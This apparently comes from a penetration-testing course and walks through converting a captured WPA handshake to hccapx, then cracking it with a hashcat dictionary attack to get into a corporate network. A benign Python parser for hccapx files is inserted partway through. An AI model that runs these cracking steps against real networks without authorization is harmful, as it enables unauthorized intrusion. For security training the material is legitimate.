65 WiFi Hijacking Hashcat Part 10
Description
After we have successfully captured a 4-way handshake with a tool such as airodump-ng, we need to convert it to hccapx format that can be provided to Hashcat for cracking.
Convert to hccapx format
The required format is hccapx, and Hashcat hosts an online service that converts captures to this format: https://hashcat.net/cap2hccapx
To do the conversion offline, we need the hashcat-utils repository from GitHub.
We can clone the repo and build the tool as follows:
$ git clone https://github.com/hashcat/hashcat-utils.git
$ cd hashcat-utils/src
$ make
Cap2hccapx - Syntax
$ ./cap2hccapx.bin
usage: ./cap2hccapx.bin input.cap output.hccapx [filter by essid] [additional network essid:bssid]
Next, we give the tool the packet capture (.cap) file to convert into the hccapx file that Hashcat will read.
$ ./cap2hccapx.bin corp_capture1-01.cap mic_to_crack.hccapx
Networks detected: 1
[*] BSSID=cc:40:d0:a4:d0:96 ESSID=CORP-WIFI (Length: 9)
-- STA=48:e2:44:a7:c4:fb, Message Pair=0, Replay Counter=1
-- STA=48:e2:44:a7:c4:fb, Message Pair=2, Replay Counter=1
-- STA=48:e2:44:a7:c4:fb, Message Pair=0, Replay Counter=1
...
Written 8 WPA Handshakes to: /home/mrb3n/Desktop/mic_to_crack.hccapx
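To check what a conversion actually produced (which networks, which stations, which key version) before handing the file on, here is a small parser for the hccapx v4 record layout. This is an added example, not code from hashcat-utils; the record layout is the one hashcat documents (393 bytes per handshake), and the sample file it builds uses the page's BSSID/STA values with made-up nonces and MIC.

```python
import struct
from collections import defaultdict

# hccapx v4 record layout (393 bytes, little-endian) as documented by hashcat:
# signature, version, message_pair, essid_len, essid, keyver, keymic,
# mac_ap, nonce_ap, mac_sta, nonce_sta, eapol_len, eapol
HCCAPX_FMT = "<4sIBB32sB16s6s32s6s32sH256s"
HCCAPX_SIZE = struct.calcsize(HCCAPX_FMT)  # 393
KEYVER = {1: "WPA", 2: "WPA2", 3: "WPA2-CMAC"}

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_hccapx(data):
    """Parse every 393-byte record of an hccapx file into a dict."""
    if len(data) % HCCAPX_SIZE:
        raise ValueError("length is not a multiple of %d bytes" % HCCAPX_SIZE)
    records = []
    for off in range(0, len(data), HCCAPX_SIZE):
        (sig, ver, mp, essid_len, essid, keyver, mic, mac_ap, _anonce,
         mac_sta, _snonce, eapol_len, _eapol) = struct.unpack_from(HCCAPX_FMT, data, off)
        if sig != b"HCPX" or ver != 4:
            raise ValueError(f"bad signature/version at offset {off}")
        records.append({"essid": essid[:essid_len].decode("utf-8", "replace"),
                        "bssid": mac(mac_ap), "sta": mac(mac_sta),
                        "message_pair": mp, "keyver": KEYVER.get(keyver, "?"),
                        "mic": mic.hex(), "eapol_len": eapol_len})
    return records

def summarize(records):
    """Group handshakes by (BSSID, ESSID), like cap2hccapx's console output."""
    nets = defaultdict(list)
    for r in records:
        nets[(r["bssid"], r["essid"])].append((r["sta"], r["message_pair"]))
    return dict(nets)

def build_record(essid, bssid, sta, message_pair, keyver=2):
    """Constructed sample record: placeholder nonces/MIC, not a real capture."""
    e = essid.encode()
    return struct.pack(HCCAPX_FMT, b"HCPX", 4, message_pair, len(e), e, keyver,
                       b"\x11" * 16, bytes.fromhex(bssid.replace(":", "")),
                       b"\x22" * 32, bytes.fromhex(sta.replace(":", "")),
                       b"\x33" * 32, 0, b"")

# Constructed two-record file for the network shown in the page's output.
SAMPLE = (build_record("CORP-WIFI", "cc:40:d0:a4:d0:96", "48:e2:44:a7:c4:fb", 0)
          + build_record("CORP-WIFI", "cc:40:d0:a4:d0:96", "48:e2:44:a7:c4:fb", 2))
```

On a real file, call `summarize(parse_hccapx(open("mic_to_crack.hccapx", "rb").read()))` to list the captured networks and stations per handshake.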
With this file (mic_to_crack.hccapx), we can proceed to crack the handshake.
For this example, we will perform a straight dictionary attack against the WPA handshake.
For the wordlist we will use rockyou.txt; Crunch, a Linux wordlist generator, could be used to build one as well.
To crack this hash we use hash mode 2500, so our command is:
hashcat -a 0 -m 2500 mic_to_crack.hccapx cell.txt --deprecated-check-disable
Armed with this key, we can now attempt to authenticate to the wireless network and attempt to gain access to the company's internal network.